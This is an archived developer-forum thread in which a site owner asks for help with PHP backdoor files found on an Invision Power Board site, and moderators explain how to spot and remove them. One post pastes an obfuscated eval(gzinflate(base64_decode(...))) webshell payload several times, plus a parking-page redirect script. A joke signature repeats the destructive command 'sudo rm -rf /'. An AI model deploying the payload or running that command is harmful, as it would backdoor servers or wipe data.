Jump to content


Check out our Community Blogs

Register and join over 40,000 other developers!


Recent Status Updates

View All Updates

Photo
- - - - -

Virus on my website?

virus remove infection

This topic has been archived. This means that you cannot reply to this topic.
15 replies to this topic

#1 Keslaw

Keslaw

    CC Lurker

  • New Member
  • Pip
  • 7 posts

Posted 01 November 2014 - 09:48 AM

If this is wrong section, please move it to proper one.

 

I found viruses on my website, I have to put code of 2 infected files on pastebin.com, because this is really long code and this forum returns to me an error, when I want to put it directly here :)

 

First file (I think that back_connect here is the main problem, anyway, when I'm trying to remove this, it is still infected, I don't know what exact code I have to remove from it):

http://pastebin.com/5gV5MtQt

 

Second file (like first one):

http://pastebin.com/QHkY039N

 

Please help ASAP, thank you in advance.



#2 dargueta

dargueta

    I chown trolls.

  • Moderator
  • 4854 posts

Posted 01 November 2014 - 10:24 AM

In the first file, delete back_connect_p and everything inside the if(isset($_POST['p1'])) block. That's lines 1476 to 1498 in the first file and 2999-3039 in the second one.

 

If the files keep replacing themselves you have yourself a significantly more complicated problem.


Edited by dargueta, 01 November 2014 - 10:26 AM.

sudo rm -rf / && echo $'Sanitize your inputs!'


#3 Keslaw

Keslaw

    CC Lurker

  • New Member
  • Pip
  • 7 posts

Posted 02 November 2014 - 12:01 AM

After deleting those lines in first file, avast still detects: PHP:Shell-AA [Trj] 



#4 dargueta

dargueta

    I chown trolls.

  • Moderator
  • 4854 posts

Posted 02 November 2014 - 12:05 AM

Also delete bind_port_p.


sudo rm -rf / && echo $'Sanitize your inputs!'


#5 Keslaw

Keslaw

    CC Lurker

  • New Member
  • Pip
  • 7 posts

Posted 02 November 2014 - 12:15 AM

I did, it still detects it.



#6 dargueta

dargueta

    I chown trolls.

  • Moderator
  • 4854 posts

Posted 02 November 2014 - 12:34 AM

After some digging around (see here) I've come to the realization that the entire file is the virus - it's a backdoor shell that an attacker can use via PHP.


sudo rm -rf / && echo $'Sanitize your inputs!'


#7 Keslaw

Keslaw

    CC Lurker

  • New Member
  • Pip
  • 7 posts

Posted 02 November 2014 - 12:40 AM

So, removing those 2 files won't fix this?



#8 dargueta

dargueta

    I chown trolls.

  • Moderator
  • 4854 posts

Posted 02 November 2014 - 12:44 AM

Will. Both files are viruses, delete them and you should be okay.


sudo rm -rf / && echo $'Sanitize your inputs!'


#9 Keslaw

Keslaw

    CC Lurker

  • New Member
  • Pip
  • 7 posts

Posted 02 November 2014 - 01:44 AM

U are sure?

 

Locations and names of both ones:

 

forum_name/cache/settings.php
ips_kernel/classKernel.php


#10 Alexander

Alexander

    YOL9

  • Moderator
  • 3963 posts

Posted 02 November 2014 - 10:11 AM

The attacker is most successful when they does not arouse suspicion, and so if they put a file named "settings.php" in a cache folder you naturally assume it is designed to be there. But does cache have settings? And why is it in a separate file and not a main control panel?

 

The second seems even more likely to be fake, and so I look up "ips_kernel" on my favourite flavour of search engine and find it is a folder within Invision Power Board, and that in a directory listed on their site of that folder (of at least IPB 3.3.0) there is no file named classKernel.php

http://community.inv...9379730628.html

 

If someone sees "ips_kernel" and understands it is part of their system, and then sees classKernel (which is similar to the actual classDb file in there belonging to IPB) it would probably fly past the webmaster, and that is the hope of the attacker.

 

Remember, you often have to think like a criminal to beat one. Them putting "backdoorlulz.php" in every folder will be found and removed surely faster.

 

 

I did, it still detects it.

 

This is because your antivirus has a signature-based detection for these malicious backdoor scripts, and only needs to store some common samples of the entire file to realise it is the backdoor file. If someone changes one line, it will still detect it, which is the idea behind the antivirus having heuristics to be useful to the end-user so that it is harder for people to obscure malware.

 

If you are worried about the two files being important, quarantine them if possible, however they are very unlikely part of the system.

 

You have to then realise that the files were placed there somehow, not magically, either through shell/FTP/web panel access (change all of your passwords immediately!) or through a vulnerability in not only IPB, but one of your softwares you may have installed on your server beside IPB, and the unfortunate possibility remains that if you are using shared hosting that someone had compromised the main underlying system and had infected everybody indiscriminately.

 

Alexander.


Edited by Alexander, 02 November 2014 - 10:16 AM.

All new problems require investigation, and so if errors are problems, try to learn as much as you can and report back.


#11 Keslaw

Keslaw

    CC Lurker

  • New Member
  • Pip
  • 7 posts

Posted 02 November 2014 - 10:33 AM

Ok, I deleted those 2 ones, but I found in cache folder 2 files named: bbb.php and cbb.php and df.php

 

bbb.php code:

 

http://pastebin.com/Y24t3MEC


cbb.php code:

 
==============================================================================
=========================        END       ===================================
========================= /index.php?<?error_reporting(0);print(___);eval(gzinflate(base64_decode('lVZtb9s2EP6cAPkPV8GAZcCJ7XSfYmRA0aZFMTQZnHT90BUCI51iwhKpkVTdbMh/3/FI+WVzHBcwoJC8e/jcPXfHWHSZkzVmlaylg3Q8mJ4c9/64mt1+vLmGS0gmZ+PEb8mGVr3sw9Xd175s+t+mALTbaOPW+37FJ3yWz1u1yKz8G8li8st47GGWRjrMBO2otqr8DhqjzdaOnWNV0brfKlEjnIopLKcgiymM7qUa2Tmcyr43LATWWpElQxd43z7EhSwhLVuVO6lVhj+kdTbtN7lyVVZqs+gPBvDPyfHRaATvaQlCFTAX3xHcHKERBpWDxugcrQXydmTaa2RB4GuM1GfqiH7+rnB6CaeTAHzUGKmcdGlyNZvdzC7grVB9B94vYb8jD5tO+O+nbZyIwAYkBwCx/D1w8ns2eAT2n8QikM5bs8VagKUPRQ8VigJNMP8iKbFaVY9g2zxHLIAuXSLzwiJyaLSVPzKLzsoiHTwTlReti6oz3RmZT91KpwltPgFWFhlvBfflzez64/WHC3gvZEWsnIbgIy2eAdzNpQX6/dVS8UCua4/mNVOaciqcqM74brounxfSpMmI120t7CKWtNX5ghiU/qsbVClV9BC4gOlDRah0+FpnhvCanXw2XrHnYJtvtCO92DFGvg78icvR5kY2ThvbYE5XC2PEY3pyTN0xhstf4zppZIPJEBKTDIastXWFVD5cAf6M5BUuaDyXVQFLr6EhUaE0uma4yQ645Qacbt0LeNyWlHaGO98NBx0cxXwwnM+GnxOxLC+5QLMgAPc5JX07U14UwrUrAaTNDFrdmhzTDmjwH0G2usw2YqmA0XcIQ7qhqH19Z/cVSSvVQxpu/Dr+NgQWfo/N5ACb8702vp7i+cnxKoJb35DWljQDH8Hnh9rA4Hc01CthIFJTUM1ecMkmwXtJKUdIY3vy0ENdhisGz0yiWwbLtVLI4xEcmloq4bCIDXxPpBfdYFqDdvHvB+6U3o/a8wXMQz/UWUzKRo5XqWTvnmrrLJ8L9YBF5m1p5JDzKr8VxZJGUPKNr0xoaP+6DPlxYSgfkFTZ9r3Bs4uMJzE/JwNYC3Tz9jeYXb15F+PpSdW0/vErvfMKaf3qBbNnsS4gIES4kjlvVmI4HmwKsea9kahDuN+9u/l8t4/9Bt5hETDiMzHEVLzM//xw/lRkL/M//xn+hPgT/PkpK/NK22jgD7p1J9r/9yY79kJN8yDs9uNU86bxv5aOKnGnKqfBse7xV/FB3exDSKLZnyrpGP8L')));?> ===================================
==============================================================================
==============================================================================
=========================        END       ===================================
========================= /index.php?<?error_reporting(0);print(___);eval(gzinflate(base64_decode('lVZtb9s2EP6cAPkPV8GAZcCJ7XSfYmRA0aZFMTQZnHT90BUCI51iwhKpkVTdbMh/3/FI+WVzHBcwoJC8e/jcPXfHWHSZkzVmlaylg3Q8mJ4c9/64mt1+vLmGS0gmZ+PEb8mGVr3sw9Xd175s+t+mALTbaOPW+37FJ3yWz1u1yKz8G8li8st47GGWRjrMBO2otqr8DhqjzdaOnWNV0brfKlEjnIopLKcgiymM7qUa2Tmcyr43LATWWpElQxd43z7EhSwhLVuVO6lVhj+kdTbtN7lyVVZqs+gPBvDPyfHRaATvaQlCFTAX3xHcHKERBpWDxugcrQXydmTaa2RB4GuM1GfqiH7+rnB6CaeTAHzUGKmcdGlyNZvdzC7grVB9B94vYb8jD5tO+O+nbZyIwAYkBwCx/D1w8ns2eAT2n8QikM5bs8VagKUPRQ8VigJNMP8iKbFaVY9g2zxHLIAuXSLzwiJyaLSVPzKLzsoiHTwTlReti6oz3RmZT91KpwltPgFWFhlvBfflzez64/WHC3gvZEWsnIbgIy2eAdzNpQX6/dVS8UCua4/mNVOaciqcqM74brounxfSpMmI120t7CKWtNX5ghiU/qsbVClV9BC4gOlDRah0+FpnhvCanXw2XrHnYJtvtCO92DFGvg78icvR5kY2ThvbYE5XC2PEY3pyTN0xhstf4zppZIPJEBKTDIastXWFVD5cAf6M5BUuaDyXVQFLr6EhUaE0uma4yQ645Qacbt0LeNyWlHaGO98NBx0cxXwwnM+GnxOxLC+5QLMgAPc5JX07U14UwrUrAaTNDFrdmhzTDmjwH0G2usw2YqmA0XcIQ7qhqH19Z/cVSSvVQxpu/Dr+NgQWfo/N5ACb8702vp7i+cnxKoJb35DWljQDH8Hnh9rA4Hc01CthIFJTUM1ecMkmwXtJKUdIY3vy0ENdhisGz0yiWwbLtVLI4xEcmloq4bCIDXxPpBfdYFqDdvHvB+6U3o/a8wXMQz/UWUzKRo5XqWTvnmrrLJ8L9YBF5m1p5JDzKr8VxZJGUPKNr0xoaP+6DPlxYSgfkFTZ9r3Bs4uMJzE/JwNYC3Tz9jeYXb15F+PpSdW0/vErvfMKaf3qBbNnsS4gIES4kjlvVmI4HmwKsea9kahDuN+9u/l8t4/9Bt5hETDiMzHEVLzM//xw/lRkL/M//xn+hPgT/PkpK/NK22jgD7p1J9r/9yY79kJN8yDs9uNU86bxv5aOKnGnKqfBse7xV/FB3exDSKLZnyrpGP8L')));?> ===================================
==============================================================================
==============================================================================
=========================        END       ===================================
========================= /index.php?<?error_reporting(0);print(___);eval(gzinflate(base64_decode('lVZtb9s2EP6cAPkPV8GAZcCJ7XSfYmRA0aZFMTQZnHT90BUCI51iwhKpkVTdbMh/3/FI+WVzHBcwoJC8e/jcPXfHWHSZkzVmlaylg3Q8mJ4c9/64mt1+vLmGS0gmZ+PEb8mGVr3sw9Xd175s+t+mALTbaOPW+37FJ3yWz1u1yKz8G8li8st47GGWRjrMBO2otqr8DhqjzdaOnWNV0brfKlEjnIopLKcgiymM7qUa2Tmcyr43LATWWpElQxd43z7EhSwhLVuVO6lVhj+kdTbtN7lyVVZqs+gPBvDPyfHRaATvaQlCFTAX3xHcHKERBpWDxugcrQXydmTaa2RB4GuM1GfqiH7+rnB6CaeTAHzUGKmcdGlyNZvdzC7grVB9B94vYb8jD5tO+O+nbZyIwAYkBwCx/D1w8ns2eAT2n8QikM5bs8VagKUPRQ8VigJNMP8iKbFaVY9g2zxHLIAuXSLzwiJyaLSVPzKLzsoiHTwTlReti6oz3RmZT91KpwltPgFWFhlvBfflzez64/WHC3gvZEWsnIbgIy2eAdzNpQX6/dVS8UCua4/mNVOaciqcqM74brounxfSpMmI120t7CKWtNX5ghiU/qsbVClV9BC4gOlDRah0+FpnhvCanXw2XrHnYJtvtCO92DFGvg78icvR5kY2ThvbYE5XC2PEY3pyTN0xhstf4zppZIPJEBKTDIastXWFVD5cAf6M5BUuaDyXVQFLr6EhUaE0uma4yQ645Qacbt0LeNyWlHaGO98NBx0cxXwwnM+GnxOxLC+5QLMgAPc5JX07U14UwrUrAaTNDFrdmhzTDmjwH0G2usw2YqmA0XcIQ7qhqH19Z/cVSSvVQxpu/Dr+NgQWfo/N5ACb8702vp7i+cnxKoJb35DWljQDH8Hnh9rA4Hc01CthIFJTUM1ecMkmwXtJKUdIY3vy0ENdhisGz0yiWwbLtVLI4xEcmloq4bCIDXxPpBfdYFqDdvHvB+6U3o/a8wXMQz/UWUzKRo5XqWTvnmrrLJ8L9YBF5m1p5JDzKr8VxZJGUPKNr0xoaP+6DPlxYSgfkFTZ9r3Bs4uMJzE/JwNYC3Tz9jeYXb15F+PpSdW0/vErvfMKaf3qBbNnsS4gIES4kjlvVmI4HmwKsea9kahDuN+9u/l8t4/9Bt5hETDiMzHEVLzM//xw/lRkL/M//xn+hPgT/PkpK/NK22jgD7p1J9r/9yY79kJN8yDs9uNU86bxv5aOKnGnKqfBse7xV/FB3exDSKLZnyrpGP8L')));?> ===================================
==============================================================================
==============================================================================
=========================        END       ===================================
========================= /index.php?<?error_reporting(0);print(___);eval(gzinflate(base64_decode('lVZtb9s2EP6cAPkPV8GAZcCJ7XSfYmRA0aZFMTQZnHT90BUCI51iwhKpkVTdbMh/3/FI+WVzHBcwoJC8e/jcPXfHWHSZkzVmlaylg3Q8mJ4c9/64mt1+vLmGS0gmZ+PEb8mGVr3sw9Xd175s+t+mALTbaOPW+37FJ3yWz1u1yKz8G8li8st47GGWRjrMBO2otqr8DhqjzdaOnWNV0brfKlEjnIopLKcgiymM7qUa2Tmcyr43LATWWpElQxd43z7EhSwhLVuVO6lVhj+kdTbtN7lyVVZqs+gPBvDPyfHRaATvaQlCFTAX3xHcHKERBpWDxugcrQXydmTaa2RB4GuM1GfqiH7+rnB6CaeTAHzUGKmcdGlyNZvdzC7grVB9B94vYb8jD5tO+O+nbZyIwAYkBwCx/D1w8ns2eAT2n8QikM5bs8VagKUPRQ8VigJNMP8iKbFaVY9g2zxHLIAuXSLzwiJyaLSVPzKLzsoiHTwTlReti6oz3RmZT91KpwltPgFWFhlvBfflzez64/WHC3gvZEWsnIbgIy2eAdzNpQX6/dVS8UCua4/mNVOaciqcqM74brounxfSpMmI120t7CKWtNX5ghiU/qsbVClV9BC4gOlDRah0+FpnhvCanXw2XrHnYJtvtCO92DFGvg78icvR5kY2ThvbYE5XC2PEY3pyTN0xhstf4zppZIPJEBKTDIastXWFVD5cAf6M5BUuaDyXVQFLr6EhUaE0uma4yQ645Qacbt0LeNyWlHaGO98NBx0cxXwwnM+GnxOxLC+5QLMgAPc5JX07U14UwrUrAaTNDFrdmhzTDmjwH0G2usw2YqmA0XcIQ7qhqH19Z/cVSSvVQxpu/Dr+NgQWfo/N5ACb8702vp7i+cnxKoJb35DWljQDH8Hnh9rA4Hc01CthIFJTUM1ecMkmwXtJKUdIY3vy0ENdhisGz0yiWwbLtVLI4xEcmloq4bCIDXxPpBfdYFqDdvHvB+6U3o/a8wXMQz/UWUzKRo5XqWTvnmrrLJ8L9YBF5m1p5JDzKr8VxZJGUPKNr0xoaP+6DPlxYSgfkFTZ9r3Bs4uMJzE/JwNYC3Tz9jeYXb15F+PpSdW0/vErvfMKaf3qBbNnsS4gIES4kjlvVmI4HmwKsea9kahDuN+9u/l8t4/9Bt5hETDiMzHEVLzM//xw/lRkL/M//xn+hPgT/PkpK/NK22jgD7p1J9r/9yY79kJN8yDs9uNU86bxv5aOKnGnKqfBse7xV/FB3exDSKLZnyrpGP8L')));?> ===================================
==============================================================================
==============================================================================
=========================        END       ===================================
========================= /index.php?<?error_reporting(0);print(___);eval(gzinflate(base64_decode('lVZtb9s2EP6cAPkPV8GAZcCJ7XSfYmRA0aZFMTQZnHT90BUCI51iwhKpkVTdbMh/3/FI+WVzHBcwoJC8e/jcPXfHWHSZkzVmlaylg3Q8mJ4c9/64mt1+vLmGS0gmZ+PEb8mGVr3sw9Xd175s+t+mALTbaOPW+37FJ3yWz1u1yKz8G8li8st47GGWRjrMBO2otqr8DhqjzdaOnWNV0brfKlEjnIopLKcgiymM7qUa2Tmcyr43LATWWpElQxd43z7EhSwhLVuVO6lVhj+kdTbtN7lyVVZqs+gPBvDPyfHRaATvaQlCFTAX3xHcHKERBpWDxugcrQXydmTaa2RB4GuM1GfqiH7+rnB6CaeTAHzUGKmcdGlyNZvdzC7grVB9B94vYb8jD5tO+O+nbZyIwAYkBwCx/D1w8ns2eAT2n8QikM5bs8VagKUPRQ8VigJNMP8iKbFaVY9g2zxHLIAuXSLzwiJyaLSVPzKLzsoiHTwTlReti6oz3RmZT91KpwltPgFWFhlvBfflzez64/WHC3gvZEWsnIbgIy2eAdzNpQX6/dVS8UCua4/mNVOaciqcqM74brounxfSpMmI120t7CKWtNX5ghiU/qsbVClV9BC4gOlDRah0+FpnhvCanXw2XrHnYJtvtCO92DFGvg78icvR5kY2ThvbYE5XC2PEY3pyTN0xhstf4zppZIPJEBKTDIastXWFVD5cAf6M5BUuaDyXVQFLr6EhUaE0uma4yQ645Qacbt0LeNyWlHaGO98NBx0cxXwwnM+GnxOxLC+5QLMgAPc5JX07U14UwrUrAaTNDFrdmhzTDmjwH0G2usw2YqmA0XcIQ7qhqH19Z/cVSSvVQxpu/Dr+NgQWfo/N5ACb8702vp7i+cnxKoJb35DWljQDH8Hnh9rA4Hc01CthIFJTUM1ecMkmwXtJKUdIY3vy0ENdhisGz0yiWwbLtVLI4xEcmloq4bCIDXxPpBfdYFqDdvHvB+6U3o/a8wXMQz/UWUzKRo5XqWTvnmrrLJ8L9YBF5m1p5JDzKr8VxZJGUPKNr0xoaP+6DPlxYSgfkFTZ9r3Bs4uMJzE/JwNYC3Tz9jeYXb15F+PpSdW0/vErvfMKaf3qBbNnsS4gIES4kjlvVmI4HmwKsea9kahDuN+9u/l8t4/9Bt5hETDiMzHEVLzM//xw/lRkL/M//xn+hPgT/PkpK/NK22jgD7p1J9r/9yY79kJN8yDs9uNU86bxv5aOKnGnKqfBse7xV/FB3exDSKLZnyrpGP8L')));?> ===================================
==============================================================================
==============================================================================
=========================        END       ===================================
========================= /index.php?<?error_reporting(0);print(___);eval(gzinflate(base64_decode('lVZtb9s2EP6cAPkPV8GAZcCJ7XSfYmRA0aZFMTQZnHT90BUCI51iwhKpkVTdbMh/3/FI+WVzHBcwoJC8e/jcPXfHWHSZkzVmlaylg3Q8mJ4c9/64mt1+vLmGS0gmZ+PEb8mGVr3sw9Xd175s+t+mALTbaOPW+37FJ3yWz1u1yKz8G8li8st47GGWRjrMBO2otqr8DhqjzdaOnWNV0brfKlEjnIopLKcgiymM7qUa2Tmcyr43LATWWpElQxd43z7EhSwhLVuVO6lVhj+kdTbtN7lyVVZqs+gPBvDPyfHRaATvaQlCFTAX3xHcHKERBpWDxugcrQXydmTaa2RB4GuM1GfqiH7+rnB6CaeTAHzUGKmcdGlyNZvdzC7grVB9B94vYb8jD5tO+O+nbZyIwAYkBwCx/D1w8ns2eAT2n8QikM5bs8VagKUPRQ8VigJNMP8iKbFaVY9g2zxHLIAuXSLzwiJyaLSVPzKLzsoiHTwTlReti6oz3RmZT91KpwltPgFWFhlvBfflzez64/WHC3gvZEWsnIbgIy2eAdzNpQX6/dVS8UCua4/mNVOaciqcqM74brounxfSpMmI120t7CKWtNX5ghiU/qsbVClV9BC4gOlDRah0+FpnhvCanXw2XrHnYJtvtCO92DFGvg78icvR5kY2ThvbYE5XC2PEY3pyTN0xhstf4zppZIPJEBKTDIastXWFVD5cAf6M5BUuaDyXVQFLr6EhUaE0uma4yQ645Qacbt0LeNyWlHaGO98NBx0cxXwwnM+GnxOxLC+5QLMgAPc5JX07U14UwrUrAaTNDFrdmhzTDmjwH0G2usw2YqmA0XcIQ7qhqH19Z/cVSSvVQxpu/Dr+NgQWfo/N5ACb8702vp7i+cnxKoJb35DWljQDH8Hnh9rA4Hc01CthIFJTUM1ecMkmwXtJKUdIY3vy0ENdhisGz0yiWwbLtVLI4xEcmloq4bCIDXxPpBfdYFqDdvHvB+6U3o/a8wXMQz/UWUzKRo5XqWTvnmrrLJ8L9YBF5m1p5JDzKr8VxZJGUPKNr0xoaP+6DPlxYSgfkFTZ9r3Bs4uMJzE/JwNYC3Tz9jeYXb15F+PpSdW0/vErvfMKaf3qBbNnsS4gIES4kjlvVmI4HmwKsea9kahDuN+9u/l8t4/9Bt5hETDiMzHEVLzM//xw/lRkL/M//xn+hPgT/PkpK/NK22jgD7p1J9r/9yY79kJN8yDs9uNU86bxv5aOKnGnKqfBse7xV/FB3exDSKLZnyrpGP8L')));?> ===================================
==============================================================================
==============================================================================
=========================        END       ===================================
========================= /index.php?<?error_reporting(0);print(___);eval(gzinflate(base64_decode('lVZtb9s2EP6cAPkPV8GAZcCJ7XSfYmRA0aZFMTQZnHT90BUCI51iwhKpkVTdbMh/3/FI+WVzHBcwoJC8e/jcPXfHWHSZkzVmlaylg3Q8mJ4c9/64mt1+vLmGS0gmZ+PEb8mGVr3sw9Xd175s+t+mALTbaOPW+37FJ3yWz1u1yKz8G8li8st47GGWRjrMBO2otqr8DhqjzdaOnWNV0brfKlEjnIopLKcgiymM7qUa2Tmcyr43LATWWpElQxd43z7EhSwhLVuVO6lVhj+kdTbtN7lyVVZqs+gPBvDPyfHRaATvaQlCFTAX3xHcHKERBpWDxugcrQXydmTaa2RB4GuM1GfqiH7+rnB6CaeTAHzUGKmcdGlyNZvdzC7grVB9B94vYb8jD5tO+O+nbZyIwAYkBwCx/D1w8ns2eAT2n8QikM5bs8VagKUPRQ8VigJNMP8iKbFaVY9g2zxHLIAuXSLzwiJyaLSVPzKLzsoiHTwTlReti6oz3RmZT91KpwltPgFWFhlvBfflzez64/WHC3gvZEWsnIbgIy2eAdzNpQX6/dVS8UCua4/mNVOaciqcqM74brounxfSpMmI120t7CKWtNX5ghiU/qsbVClV9BC4gOlDRah0+FpnhvCanXw2XrHnYJtvtCO92DFGvg78icvR5kY2ThvbYE5XC2PEY3pyTN0xhstf4zppZIPJEBKTDIastXWFVD5cAf6M5BUuaDyXVQFLr6EhUaE0uma4yQ645Qacbt0LeNyWlHaGO98NBx0cxXwwnM+GnxOxLC+5QLMgAPc5JX07U14UwrUrAaTNDFrdmhzTDmjwH0G2usw2YqmA0XcIQ7qhqH19Z/cVSSvVQxpu/Dr+NgQWfo/N5ACb8702vp7i+cnxKoJb35DWljQDH8Hnh9rA4Hc01CthIFJTUM1ecMkmwXtJKUdIY3vy0ENdhisGz0yiWwbLtVLI4xEcmloq4bCIDXxPpBfdYFqDdvHvB+6U3o/a8wXMQz/UWUzKRo5XqWTvnmrrLJ8L9YBF5m1p5JDzKr8VxZJGUPKNr0xoaP+6DPlxYSgfkFTZ9r3Bs4uMJzE/JwNYC3Tz9jeYXb15F+PpSdW0/vErvfMKaf3qBbNnsS4gIES4kjlvVmI4HmwKsea9kahDuN+9u/l8t4/9Bt5hETDiMzHEVLzM//xw/lRkL/M//xn+hPgT/PkpK/NK22jgD7p1J9r/9yY79kJN8yDs9uNU86bxv5aOKnGnKqfBse7xV/FB3exDSKLZnyrpGP8L')));?> ===================================
==============================================================================

df.php

 

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>


<head>
   <title>404 Error - Page Not Found</title>


<script type="text/javascript" language="JavaScript">
<!--
var domainname = window.location.hostname;
var google_afd_request = {
    client: 'ca-dp-oversee_ncd',
    domain_name: domainname,
    referrer: document.referrer,
    session_token: 'create'
};
var param_name = '';
var param_value = '';
var frame;


var registrar_frameset = function(params) {
    if (params['a_id']) {
        param_name = 'a_id';
    }
    else if (params['o_id']) {
        param_name = 'o_id';
    }
    param_value = params[param_name];
    frame = document.getElementById(params['frame']);


    document.write('<title>' + domainname + '</title>\n');
    document.write('<meta name="keywords" content="' + domainname + '">\n');
    document.write('<meta name="description" content="' + domainname + '">\n');


    var token_url = 'http://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js';
    document.write('<script type="text/javascript" language="JavaScript" ' +
                   'src="' + token_url + '"></' + 'script>\n');
}


function google_afd_ad_request_done(response) {
    var url = 'http://dsnextgen.com/?domainname=' + domainname +
              (param_name ? ('&' + param_name + '=' + param_value) : '') +
              '&session_token=' + response.session_token;
    if (frame) {
        frame.name = domainname;
        frame.location = url;
    }
    else {
                document.write('<table style="border: 1px dashed rgb(204, 204, 204);" align="center" border="0" cellpadding="6" cellspacing="0" width="800"> <tr> <td style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;"> <h1 style="margin:0px;">Page Not Found</h1> <p style="margin-top:0px;">The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. Please try the following:</p> <ul> <li>If you typed the page address in the Address bar, make sure that it is spelled correctly.</li> <li>Click the Back button in your browser to try another link.</li> <li>Use a search engine like <a href="http://www.google.com">Google</a> to look for information on the Internet.</li> </ul> </td> </tr> </table>');
        document.write('<iframe src="' + url + '" frameborder="0" height="800" scrolling="auto" width="100%"></iframe>');
    }
}
-->
</script>


<script type="text/javascript" language="JavaScript">
 registrar_frameset({a_id: 101686}); 
</script>
</head>


</html>


#12 dargueta

dargueta

    I chown trolls.

  • Moderator
  • 4854 posts

Posted 02 November 2014 - 05:08 PM

Oh dude cbb.php is totally a virus. I decoded and unpacked the code and it opens a back door shell as well. bbb.php looks like it's triggering cbb.php or doing some other logging thing. Blow that away too.


Edited by dargueta, 02 November 2014 - 05:12 PM.

sudo rm -rf / && echo $'Sanitize your inputs!'





Recommended from our users: Dynamic Network Monitoring from WhatsUp Gold from IPSwitch. Free Download